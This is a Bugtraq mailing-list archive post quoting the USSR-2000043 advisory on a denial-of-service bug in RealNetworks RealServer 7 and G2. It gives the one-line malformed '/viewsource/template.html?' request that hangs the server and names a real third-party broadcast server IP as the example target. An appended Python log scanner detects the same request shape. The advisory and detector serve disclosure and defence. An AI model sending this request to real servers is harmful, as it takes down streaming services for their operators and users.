Bugtraq mailing list archives

Re: Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability


From: christopher () SCHULTE ORG (Christopher Schulte)
Date: Fri, 2 Jun 2000 11:31:34 -0500


This same DoS appears to work on the new realserver 8 BETA:

Platform sunos-5.7-sparc
Release RealServer 8
Build Version 6.1.3.1058

I'd be safe in guessing all other platforms are affected as well.

--
Christopher Schulte
http://www.schulte.org/

Remote DoS attack in Real Networks Real Server (Strike #2)
Vulnerability

USSR Advisory Code:   USSR-2000043

Release Date:
June 1, 2000

Systems Affected:
Real Networks Real Server 7 Linuxc6
Real Networks Real Server 7 Solaris 2.6
Real Networks Real Server 7 Solaris 2.7
Real Networks Real Server 7 Solaris 2.8
Real Networks Real Server 7 Windows NT/2000
Real Networks Real Server 7 SGI Irix 6.2
Real Networks Real Server 7 SGI Irix 6.5
Real Networks Real Server 7 SCO Unixware 7.xx
Real Networks Real Server 7 FreeBSD 3.0
Real Networks Real Server 7.01 Linuxc6
Real Networks Real Server 7.01 Solaris 2.6
Real Networks Real Server 7.01 Solaris 2.7
Real Networks Real Server 7.01 Solaris 2.8
Real Networks Real Server 7.01 Windows NT/2000
Real Networks Real Server 7.01 SGI Irix 6.2
Real Networks Real Server 7.01 SGI Irix 6.5
Real Networks Real Server 7.01 SCO Unixware 7.xx
Real Networks Real Server 7.01 FreeBSD 3.0
Real Networks Real Server G2 1.0


THE PROBLEM

The Ussr Labs team has recently discovered a memory problem in the
RealServer 7 Server (patched and non-patched).

What happens is, by performing an attack sending specially-malformed
information to the RealServer HTTP Port (default is 8080), the process
containing the services will stop responding.

The Exploit:
It will take down the RealServer, causing it to stop all streaming
media broadcasts, making it non-functional (until reboot).

Example:
With the RealServer server running on 'Port' (default being 8080) the
syntax to do the D.O.S. attack is:

http://ServerIp:Port/viewsource/template.html?

And Real Server will Stop Responding.

SPECIAL NOTE: We take no responsibility for this example; it is
for educational purposes only. Don't test against British Broadcasting
Corporation 1999 Radio.

Example 2:
Radio: British Broadcasting Corporation 1999 (default in RealPlayer
8)

Radio Url:
http://playlist.broadcast.com/makeplaylist.asp?id=7708&encad=2F6164732
F617564696F686967687761792F617564696F68696768776179325F3238

RealServer http running on port 80

RealServer http ip: 206.190.42.7

Valid Url for Clip Source:
http://206.190.42.7/viewsource/template.html?nuyhtgs0pdz6iqm557a6i9bgj
054ngdnbfzgro7zxfAjq357lnwEC6ne8s5ge5hi4ejqC1t6x1amngaAmkyf59v6zgjqC1t
6x1amngoAmkyf1AvuEfhe640hBh60EeADAo2097qglh

Malformed Url for Clip Source:
http://206.190.42.7/viewsource/template.html?


Vendor Status:
Yes! Informed! I sent them more than 4 emails and each time I
received JUNK mails in reply, my Incident ID number for this request
is 19163930.


Vendor   Url: http://www.real.com
Program  Url:
http://www.realnetworks.com/products/basicserverplus/index.html?src=ho
me
Download Url:
http://proforma.real.com/rn/servers/eval/index.html?src=home,srvpl_020
400,srvntra

Related Links:

Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f,Technotronic and Rfp.

Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of Ussr. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
labs () ussrback com for permission.

Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labs () ussrback com
http://www.ussrback.com
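
A defender-side check for the request shape described in the advisory above (the view-source template requested with an empty query string), added here as an example and not part of the original post or advisory. It assumes the front end or server writes Common Log Format lines; the sample lines, addresses and function names are constructed for illustration.

```python
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Path named in the advisory. Case-insensitive matching is an assumption.
VIEWSOURCE_PATH = "/viewsource/template.html"

# Common Log Format (assumed layout): host ident user [time] "request" status
CLF = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}|-)')

def is_empty_viewsource_request(target):
    """True when the target is the view-source template with no clip token.

    The path is percent-decoded and normalised before comparison so that
    encoded or dotted spellings of the same path are not missed. A request
    with no '?' at all is flagged too, which is a conservative assumption.
    """
    parts = urlsplit(target)
    if not parts.path:
        return False
    path = normpath(unquote(parts.path)).lower()
    return path == VIEWSOURCE_PATH and parts.query == ""

def scan(lines):
    """Return (line_no, source, timestamp, target) for each matching request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = CLF.match(line)
        if m and is_empty_viewsource_request(m["target"]):
            hits.append((n, m["src"], m["ts"], m["target"]))
    return hits

# Constructed sample log lines (documentation address ranges, made-up token).
SAMPLE = [
    '192.0.2.10 - - [02/Jun/2000:11:30:01 -0500] "GET /viewsource/template.html?EXAMPLECLIPTOKEN HTTP/1.0" 200 5120',
    '198.51.100.7 - - [02/Jun/2000:11:30:09 -0500] "GET /viewsource/template.html? HTTP/1.0" - 0',
    '198.51.100.7 - - [02/Jun/2000:11:31:40 -0500] "GET /%76iewsource/./Template.html? HTTP/1.0" - 0',
    '192.0.2.10 - - [02/Jun/2000:11:32:00 -0500] "GET /index.html HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print("suspect view-source request: line %d from %s at %s -> %s" % hit)
```

The same predicate can back a reverse-proxy rule that rejects such requests before they reach the RealServer HTTP port.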


